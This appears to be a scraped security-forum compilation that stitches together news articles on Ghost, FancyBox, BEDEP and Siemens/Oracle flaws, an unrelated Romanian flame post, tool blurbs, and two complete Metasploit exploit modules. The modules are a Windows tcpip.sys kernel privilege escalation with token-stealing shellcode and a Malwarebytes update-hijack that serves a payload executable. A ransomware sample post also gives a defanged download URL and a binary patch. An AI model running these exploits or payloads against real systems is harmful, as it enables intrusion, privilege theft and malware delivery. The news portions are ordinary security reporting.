What drove IT admins crazy about the Bash vulnerability was that it was difficult to determine—and patch—everything that was making a Bash call. It was everywhere. Apparently, some of that angst applies to the Ghost vulnerability in the GNU C library, known as glibc. At first, experts believed the bug, which was related to gethostbyname function calls, was confined to Linux systems, but it didn’t take long for other exploit vectors such as PHP applications, to surface. Researchers at Veracode this week published their look at Ghost and determined that like Bash, gethostbyname is relatively everywhere. And what’s sure to compound lingering frustration over Ghost is that gethostbyname was long ago deprecated and replaced by getaddrinfo() calls in order to satisfy IPv6 compatibility. “We were surprised by the pervasiveness of calls to these functions, which are older functions which have been deprecated for about 15 years, mainly because of their lack of support for IPv6,” said Veracode cofounder and CTO Chris Wysopal. “So this analysis shows that there’s still a lot of old software out there that’s being used in production applications.” Veracode said that 41 percent of the enterprise applications uploaded to its platform in the past 90 days rely on glibc to make gethostbyname function calls. The company added that 80 percent of those potentially vulnerable applications are critical off-the-shelf or homegrown business apps that access databases and backend systems executing sensitive transactions. Most of those vulnerable applications, Veracode said, were written in C or C++, but many are also Java, PHP and .NET apps. “This implies that the vulnerability may be more widespread than might otherwise be expected,” Wysopal said. “Knowing exactly where these applications reside can help enterprises prioritize their patching efforts in globally-distributed environments.” Ghost affects most Linux systems dating back almost 15 years, in particular glibc 2.2 through 2.17. The vulnerability was patched in May 2013, though the patch was not labeled a security vulnerability and as a result may not have been widely deployed. Since the bug was disclosed, most Linux distributions have released patches, and experts say this is the best mitigation for Ghost. Researchers at Qualys discovered the vulnerability and posted a lengthy advisory that included proof-of-concept exploit code against the Exim SMTP mail transfer agent. In addition to Exim, clockdiff, procmail and pppd were initiallyidentified as vulnerable to Ghost exploits. Since then, researchers at Sucuri also said that PHP applications, including WordPress, were another weak spot. Exploiting Ghost, however, remains a challenge. “Unlike with Heartbleed, which was a protocol-level vulnerability, exploiting this vulnerability requires a specially-crafted payload that has been targeted for a specific application and hardware platform,” Wysopal said. “That means you can’t simply reuse the proof-of-concept exploit developed by Qualys (for the Exim mail server) to attack other applications. As a result, GHOST attacks are more likely to be sophisticated and targeted.” Like other Internet-wide bugs, this one can be exploited to execute code remotely, manipulate files, install malware or turn the compromised machine into a bot to be used in DDoS attacks. “Some researchers believe that the most likely outcome in a real-world scenario would be a segmentation fault, not code execution, but this can also result in a DoS attack,” Wysopal said. The Ghost bug and other major vulnerabilities of the last nine months are a reminder of the frailty of open source security as well as how much insecure legacy code is running inside most enterprises. “The most important conclusion is that our entire digital infrastructure is built on applications and components that were fundamentally not designed for the hostile cyber environment in which we find ourselves today,” said Wysopal, who added that 90 percent of the applications scanned and analyzed by Veracode’s service contain common application security vulnerabilities such as SQL injection. “Rather, they were designed with a primary focus on functionality rather than on secure programming practices.” Source

Fetele, de ce comentati aiurea? postul era de xylitol ( un om foarte cunoscut in Franta si influent) ma cunosc cu el de ceva timp. app am pus sursa ca de pe acel forum l-am luat dar ulterior au mutat postul. ( Sunt membru pe KM din 2010 ) Download-ul inca merge asa ca GURA! Va place sa comentati aiurea dar inainte incercati sa descarcati geniilor. @NETGEAR in loc sa comentati da-ti log out. Nu mai comentati aiurea, nu mai incercati sa va bagati in seama cu mine ca nu dau tuturor.... importanta! Voi sunteti aici doar pentru offtopic ( fiindca sa vede ca doar asta va duce capul) Ba mai mult unu dintre voi (se stie el) are deja 20 de conturi banate si asta spune totul. AMIN! Melodie cu dedicatie speciala pentru: Doru alu' Supozitor si Vasile n'Curamluat-o @NETGEAR Primele mele posturi sunt in 2011 ( 21-11-2011 )Oricum iti urez noroc cu cariera ta de hater( copil cu 8 clase )

A WordPress plugin downloaded half a million times has been used in zero day attacks that served up malware. The plugin in question is called FancyBox and creates a lightbox-like interface with which to look at images. It's been used by unknown actors to deliver a malicious iframe through a persistent cross-site scripting vulnerability identified by Russian researchers Gennady and Konstantin Kovshenin. The duo provided details to Sucuri chief tech bod Daniel Cid who issued an advisory warning users to dump the plug in. FancyBox's authors have updated the code, so users can now update to repaired versions that will close off the attack vector. Cid said "many sites" were compromised but did not specify a figure. "After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site," Cid said. "What makes things worse, is that it's being actively exploited in the wild, leading to many compromised websites." WordPress pulled the plugin prior to the patch, as the vulnerability allowed random scripts to be loaded into vulnerable sites. Reports first emerged of the bug on the WordPress forums where users reported iframes were being injected from website 203koko. The vulnerability followed what was described as the "most serious" hole in five years, disclosed last November, that affected what was then estimated to be 86 per cent of WordPress websites. That cross-site scripting hole was found in the hugely-popular WP-Statistics plugin. Earlier, Cid revealed 50,000 WordPress websites had been infected with dodgy malware that found its way into MailPoet, another in a long time of plugins to have put sites at risk. Source

Hackers are using a zero-day vulnerability in Adobe Flash to infect systems with a dangerous BEDEP malware variant. Trend Micro research engineer Alvin Bacani reported uncovering the campaign in a threat advisory, proving that hackers began targeting the zero-day less than a week after its discovery. "Continuing our analysis of the recent Adobe zero-day exploit, we find that the infection chain does not end with the Flash exploit, detected as SWF_EXPLOIT.MJST. Rather, the exploit downloads and executes malware belonging to the BEDEP family," read the advisory. Trend Micro reported uncovering the Flash flaw on 2 February, warning that attackers could target victims with malvertising attacks. The flaw is originally believed to have been targeted by hackers using the Angler Exploit Kit to send malicious automatic pop-up adverts. Bacani explained that BEDEP employs the same malvertising infection tactic, but uses the Hanjuan exploit kit to connect victim machines to a criminal botnet. "Based on our analysis, the infection chain begins with a site that hosts malvertisements. As the name implies, these are infected online advertisements," read the advisory. "Our recent findings also show that the malware's main purpose is to turn infected systems into botnets for other malicious intentions. "Additionally, BEDEP is known for carrying out advertising fraud routines and downloading additional malware." The full scale of the campaign remains unknown and the nature of the BEDEP malware makes tracking the attacks difficult. "The fact that the payloads are encoded can be seen as one way of evading detection. An encoded payload will be difficult to identify when passing through the network layer, or when scanned in any layer in an encoded state," noted Bacani. "BEDEP initially came undetected and unnoticed due to its heavy encryption and use of Microsoft file properties for its disguise as well as the use of seemingly legitimate export functions." The flaw is one of three recently discovered Flash zero-day vulnerabilities. The first two were uncovered by Adobe in January and are known to have been actively targeted by hackers. Source

dirs3arch is a simple command line tool designed to brute force the discovery of directories and files in websites. Changes: Ported to Python3. Fixed issue3. Fixed timeout exception. Other bugfixes. Download: Download: dirs3arch Directory Checker 0.3.0 ? Packet Storm

This is a PHP script that uses md5.gromweb.com to see if a provided md5 is a known value. Link download: Download: INURLBR MD5 Checker ? Packet Storm

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel include Msf::Post::File include Msf::Post::Windows::FileInfo include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info={}) super(update_info(info, { 'Name' => 'Windows tcpip.sys Arbitrary Write Privilege Escalation', 'Description' => %q{ A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys, can allow an attacker to inject controlled memory into an arbitrary location within the kernel. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC 'Jay Smith <jsmith[at]korelogic.com>' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ ['Windows Server 2003 SP2', { '_KPROCESS' => "\x38", '_TOKEN' => "\xd8", '_UPID' => "\x94", '_APLINKS' => "\x98" } ] ], 'References' => [ ['CVE', '2014-4076'], ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt'] ], 'DisclosureDate'=> 'Nov 11 2014', 'DefaultTarget' => 0 })) end def check if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Safe end handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') return Exploit::CheckCode::Safe unless handle session.railgun.kernel32.CloseHandle(handle) file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys" unless file?(file_path) return Exploit::CheckCode::Unknown end major, minor, build, revision, branch = file_version(file_path) vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") if ("#{major}.#{minor}.#{build}" == "5.2.3790" && revision < 5440) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end unless check == Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') if handle.nil? fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device") end print_status("Storing the shellcode in memory...") this_proc = session.sys.process.open session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE") unless this_proc.memory.writable?(0x1000) fail_with(Failure::Unknown, 'Failed to allocate memory') end buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00" sc = token_stealing_shellcode(target, nil, nil, false) # move up the stack frames looking for nt!KiSystemServicePostCall sc << "\x31\xc9" # xor ecx, ecx sc << "\x89\xeb" # mov ebx, ebp # count_frames sc << "\x41" # inc ecx sc << "\xf7\x43\x04\x00\x00\x00\x80" # test dword [ebx+4], 0x80000000 sc << "\x8b\x1b" # mov ebx, dword [ebx] sc << "\x75\xf4" # jne short count_frames sc << "\x49" # dec ecx # loop_frames sc << "\x49" # dec ecx sc << "\x89\xec" # mov esp, ebp sc << "\x5d" # pop ebp sc << "\x83\xf9\x00" # cmp ecx, 0 sc << "\x75\xf7" # jne loop_frames sc << "\x31\xc0" # xor eax, eax sc << "\xc3" # ret this_proc.memory.write(0x28, "\x87\xff\xff\x38") this_proc.memory.write(0x38, "\x00\x00") this_proc.memory.write(0x1100, buf) this_proc.memory.write(0x2b, "\x00\x00") this_proc.memory.write(0x2000, sc) print_status("Triggering the vulnerability...") session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0) #session.railgun.kernel32.CloseHandle(handle) # CloseHandle will never return, so skip it print_status("Checking privileges after exploitation...") unless is_system? fail_with(Failure::Unknown, "The exploitation wasn't successful") end print_good("Exploitation successful!") unless execute_shellcode(payload.encoded, nil, this_proc.pid) fail_with(Failure::Unknown, 'Error while executing the payload') end end end Source

PHP backdoor, not that interesting but might occur more in the future. Reference: https://www.htbridge.com/blog/ransomweb_emerging_website_threat.html Download Source

Generic ransomware pushed to small ZeuS botnet machines by script: user_execute hxxp://ge.tt/api/1/files/4k8mPe82/0/blob?download >> (informations.exe) zeus script.png (835.88 KiB) Viewed 115 times ec2b6ecfc8ca67f9357b6550166a0838 informations.exe (UPX) 6ec6069728a91a04407283bc6bf208b7 UNPACKED Some generic ransomware junk..run in VM it asks for a password to decrypt files so I thought I would try to crack. winxp.png (590.39 KiB) Viewed 115 times I'm not a great RE like most ppl on here so I gave up and just patched the binary Change 00401C19 > JMP 0040124F (decryption routine) Attached are samples and patched binary in case anyone needs to unlock stuff... I was surprised, the malware does decrypt everything.. I did not look into the encryption routine or the password too much, but I'm sure someone around here can figure it out. Download Source

Another security advisory covering Siemens industrial kit has reached the public, this time covering wireless industrial networking hardware. ICS-CERT advises that the Ruggedcom range of 802.16e (Wimax, for those with long memories) switches from the company carries a range of vulnerabilities that let attackers scam admin privileges for themselves. The vulnerabilities are: CVE- 2015-1448 – attackers can get administrative access to the kit over the network, without authentication; CVE- 2015-1449 – a buffer overflow in the integrated Web server means an attacker over port 443 might get remote code execution access; and CVE- 2015-1357 – a real treat: password hashes and other sensitive information “might” be stored in an insecure format and accessible from local files or security logs. Products impacted are in the company's WIN 51xx, WIN 52xx, WIN 70xx and WIN 72xx series. These are Wimax base stations designed for harsh environment deployments. The ICS-CERT note puts the kit in a wide range of industries worldwide, including chemical, communications, critical manufacturing, dams, defence, energy, food and agriculture, government facilities, transportation systems, and water and wastewater systems. Siemens is asking customers to get in touch (online support request to get a firmware update. And in a separate advisory, the company also updated the firmware for its Scalance-X switches (which connect things like programmable logic controllers to the control interfaces) to block yet a separate authentication failure in the Web interface. Details here. Source

Oracle has issued a patch to fix several bugs in its Hyperion Product Management financial consolidation and reporting application that could be remotely exploited by hackers. Oracle's Proactive Support team announced the fixes, confirming that they address a number of flaws in the Hyperion Planning 11.1.2.2.x part of the application. The company does not offer firm details about the patch to non-registered customers, and had not responded to V3's request for further details at the time of publishing. However, TK Keanini, chief technology officer at Lancope, told V3 that the user base and nature of data handled within Hyperion means customers should be concerned by the flaw. "If you are running this software, it contains up-to-date business intelligence that you must keep secure. So if you are running this software it is incredibly important to keep it up to date and patched," he said. ? "Ask yourself this: if the information in your Hyperion system was compromised and posted to the internet for all to see, would you be OK with that? ? "The problem most companies face is that they sometimes don't know what is running on their network and this is problem number one that must be solved." Keanini explained that companies should patch the remote access vulnerabilities as soon as possible, but added that he has yet to see any evidence of the flaws being actively exploited by hackers. "This is not just one vulnerability but several. The CVEs that have remote access are the most important to fix first," he said. ? "I have not [seen the flaws being exploited] but when data is published to the internet, it is not like attackers take the time to show their timeline and the provenance of the data. ? "This is always interesting data but also a dangerous indicator because it is a lagging indicator at best." The Hyperion patch is one of many critical fixes issued by Oracle this year. The firm released a critical update in January addressing 167 vulnerabilities across hundreds of its products, including Java. Source

CONTENTS I. Worms A. What are Worms ……………………………………………………....... 1 B. Few Popular Worms ………………………………………………….… 2 C. Propagation of Worms ……………………………………………….…. 3 D. Worm Signatures and Detection Strategies …………………………...... 5 II. Metamorphic Worms A. Introduction …………………………………………………………….. 6 B. Polymorphic vs. Metamorphic Worms ……………………………….... 6 C. Challenges faced during Detection …………………………………….. 7 D. Detection Strategies ……………………………………………………. 8 III. Result A. Metamorphic Engines ………………………………………………….. 9 B. Research Answer ……………………………………………………… 14 IV. Conclusion ………………………………………………………………... 15 V. References ………………………………………………………………… 16 Read more: http://dl.packetstormsecurity.net/papers/worms/fia_ppr.pdf

WordPress Platform Theme Remote Code Execution WordPress Pixabay Images PHP Code Upload

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer VERSION_REGEX = /\/v2\/(mbam|mbae)\/consumer\/version.chk/ EXE_REGEX = /\/v2\/(mbam|mbae)\/consumer\/data\/(mbam|mbae)-setup-(.*)\.exe/ NEXT_VERSION = { mbam: '2.0.3.1025', mbae: '1.04.1.1012' } def initialize(info = {}) super(update_info(info, 'Name' => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in the update functionality of Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes Anti-Exploit consumer 1.03.1.1220. Due to the lack of proper update package validation a man-in-the-middle attacker could execute arbitrary code by spoofing the update server data-cdn.mbamupdates.com and uploading an executable. This module has been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220. }, 'License' => MSF_LICENSE, 'Author' => [ 'Yonathan Klijnsma', # Vulnerability discovery and PoC 'Gabor Seljan', # Metasploit module 'todb' # Module refactoring ], 'References' => [ [ 'CVE', '2014-4936' ], [' OSVDB', '116050'], [ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Dec 16 2014', 'DefaultTarget' => 0 )) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]), OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]) ], self.class) # Vulnerable Malwarebytes clients do not allow altering these. deregister_options('SSL', 'SSLVersion', 'SSLCert') end def on_request_uri(cli, request) case request.uri when VERSION_REGEX serve_update_notice(cli) if set_exploit_target($1, request) when EXE_REGEX serve_exploit(cli) else vprint_status "Sending empty page for #{request.uri}" serve_default_response(cli) end end def serve_default_response(cli) send_response(cli, '') end def check_client_version(request) return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/ this_version = $1 next_version = NEXT_VERSION[:mbam] if Gem::Version.new(next_version) >= Gem::Version.new(this_version) return true else print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update." return false end end def set_exploit_target(package, request) case package when /mbam/i if check_client_version(request) @client_software = ['Anti-Malware', NEXT_VERSION[:mbam]] else serve_default_response(cli) return false end when /mbae/i # We don't get identifying info from MBAE @client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]] end end def serve_update_notice(cli) software,next_version = @client_software print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'." send_response(cli, next_version, 'Content-Type' => 'application/octet-stream' ) end def serve_exploit(cli) print_status "Sending payload EXE..." send_response(cli, generate_payload_exe, 'Content-Type' => 'application/x-msdos-program' ) end end Source